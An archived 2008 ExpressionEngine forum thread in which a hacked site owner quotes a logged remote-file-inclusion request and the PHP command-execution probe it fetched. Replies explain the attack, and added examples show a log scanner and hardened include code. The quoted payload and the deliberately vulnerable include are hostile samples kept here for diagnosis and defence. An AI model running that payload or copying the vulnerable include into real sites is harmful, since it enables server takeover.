ExpressionEngine CMS

This is an archived forum and the content is probably no longer relevant, but is provided here for posterity.

is this hacking code

April 12, 2008 8:26am

  • #1 / Apr 12, 2008 8:26am

    dbashyal

    117 posts

    Hi,
    my site has been continuously hacked since last week. When I looked at the access log I found this:
    http://www. myurl file .php?prefix=http://t0dz.tripod.com/id.txt?
    The code in that id.txt file was:

    <!--
    echo "Mic22";
    $cmd="id";
    $eseguicmd=ex($cmd);
    echo $eseguicmd;
    function ex($cfe){
    $res = '';
    if (!empty($cfe)){
    if(function_exists('exec')){
    @exec($cfe,$res);
    $res = join("\n",$res);
    }
    elseif(function_exists('shell_exec')){
    $res = @shell_exec($cfe);
    }
    elseif(function_exists('system')){
    @ob_start();
    @system($cfe);
    $res = @ob_get_contents();
    @ob_end_clean();
    }
    elseif(function_exists('passthru')){
    @ob_start();
    @passthru($cfe);
    $res = @ob_get_contents();
    @ob_end_clean();
    }
    elseif(@is_resource($f = @popen($cfe,"r"))){
    $res = "";
    while(!@feof($f)) { $res .= @fread($f,1024); }
    @pclose($f);
    }}
    return $res;
    }
    exit;

    and the source code of the replaced index file is here:
    http://www.0point5.com/hacked-1.htm

    Does anyone know about these things and how to prevent them?
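    The request quoted in this post has the usual shape of a remote-file-inclusion probe: a GET parameter whose value is itself a URL. The PHP below is an added example, not code from the original post, that scans access-log lines for that pattern and reports the client address and the offending parameter. The log lines are constructed samples in Apache combined format, and the addresses and hostname in them are placeholders.

```php
<?php
// Added example (not from the original post): scan web-server access log lines
// for query-string parameters whose value is itself a URL, the signature of a
// remote-file-inclusion attempt like the one quoted above.
// The log lines below are constructed samples in Apache combined format.

$sampleLog = <<<'LOG'
203.0.113.5 - - [12/Apr/2008:08:20:11 +0000] "GET /index.php?prefix=http://example.org/id.txt? HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.7 - - [12/Apr/2008:08:21:02 +0000] "GET /index.php?page=about HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
203.0.113.5 - - [12/Apr/2008:08:22:40 +0000] "GET /index.php?prefix=ftp://example.org/x.txt HTTP/1.1" 200 512 "-" "Mozilla/5.0"
LOG;

/**
 * Return the request target (path plus query string) of an Apache combined
 * log line, or null when the line does not have the expected shape.
 */
function parseRequestTarget(string $line): ?string
{
    if (preg_match('/"(?:GET|POST|HEAD) (\S+) HTTP\/[\d.]+"/', $line, $m)) {
        return $m[1];
    }
    return null;
}

/**
 * Report query parameters whose value looks like a remote URL or a PHP
 * stream wrapper. Returns [parameter => value] for each suspicious one.
 */
function findRemoteIncludeParams(string $target): array
{
    // Take the query string after the first '?' ourselves; parse_url() is
    // unreliable when the query itself contains a URL.
    $pos = strpos($target, '?');
    if ($pos === false) {
        return [];
    }
    parse_str(substr($target, $pos + 1), $params);

    $hits = [];
    foreach ($params as $name => $value) {
        if (is_string($value) && preg_match('#^(?:https?|ftp|php|data)://#i', $value)) {
            $hits[$name] = $value;
        }
    }
    return $hits;
}

foreach (explode("\n", $sampleLog) as $line) {
    $target = parseRequestTarget($line);
    if ($target === null) {
        continue;
    }
    $hits = findRemoteIncludeParams($target);
    if ($hits !== []) {
        $ip = strtok($line, ' ');   // client address is the first field
        foreach ($hits as $name => $value) {
            printf("suspicious: %s param %s=%s\n", $ip, $name, $value);
        }
    }
}
```

    Run it with php on a saved log file instead of the embedded sample to get one line per flagged request; the benign about-page request produces nothing. Repeated hits from one address against the same parameter are the cue to block the address and audit the script that reads that parameter.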

  • #2 / Apr 12, 2008 12:59pm

    mironcho

    119 posts

    This code tries to execute the system command ‘id’ (Unix/Linux), which prints the user identity (which groups the current user belongs to, etc.). So IF this has been executed, the attacker will know more about the user’s rights (your hosting rights) and can eventually use this information for further attacks (likely again with the same script but with a different, worse, command).

  • #3 / Apr 12, 2008 1:01pm

    Popcorn

    225 posts

    Looks like you’re not checking where the files are coming from within your GET variable. Anyway, this looks like a shell script to me and the practice is called “remote code execution”, and this is where the hacker will try to import and execute his code on your server.

    You need to limit access to your server files in the GET variable.
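    One way to act on Popcorn’s advice, as an added example that is not code from the original post or from ExpressionEngine: the vulnerable include pattern beside a hardened version that only maps an allowlisted key to a file under a fixed directory. The parameter name prefix comes from the logged request; the templates directory, the template names and PHP 7.1 or later are assumptions of the example.

```php
<?php
// Added example (not from the original post or from ExpressionEngine):
// the pattern Popcorn describes, shown first as the vulnerable include and
// then hardened. The parameter name 'prefix' comes from the logged request;
// the templates directory and template names are constructed for the example.
// Assumes PHP 7.1+ (nullable types, constant expressions).

// VULNERABLE: whatever arrives in ?prefix= is passed straight to include().
// With allow_url_include enabled, a remote URL in that parameter makes PHP
// fetch and execute someone else's code; even with it disabled, the value can
// still be pointed at local files the script never meant to include.
function includeVulnerable(): void
{
    include $_GET['prefix'] . '/header.php';
}

// HARDENED: the request selects a key, never a path. Only values present in
// the allowlist are ever turned into file names, and the file is resolved
// relative to a fixed directory.
const INCLUDE_DIR = __DIR__ . '/templates';   // assumed layout
const ALLOWED_PREFIXES = [
    'default' => 'default',
    'mobile'  => 'mobile',
    'print'   => 'print',
];

/**
 * Map the user-supplied prefix to an absolute path under INCLUDE_DIR,
 * or return null if the value is not on the allowlist or resolves outside it.
 */
function resolvePrefix(?string $requested): ?string
{
    if ($requested === null || !array_key_exists($requested, ALLOWED_PREFIXES)) {
        return null;
    }
    $path = INCLUDE_DIR . '/' . ALLOWED_PREFIXES[$requested] . '/header.php';

    // realpath() collapses any ../ sequences and fails for missing files;
    // confirm the result still lies inside INCLUDE_DIR before using it.
    $real = realpath($path);
    $base = realpath(INCLUDE_DIR);
    if ($real === false || $base === false
        || strpos($real, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $real;
}

function includeHardened(): void
{
    $file = resolvePrefix($_GET['prefix'] ?? null);
    if ($file === null) {
        http_response_code(400);
        exit('unknown template');
    }
    include $file;
}
```

    Alongside the code change, set allow_url_include = Off in php.ini (and allow_url_fopen = Off if nothing on the site needs it) so that include() cannot fetch remote URLs at all, and keep include() arguments out of user control entirely wherever the design allows it.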
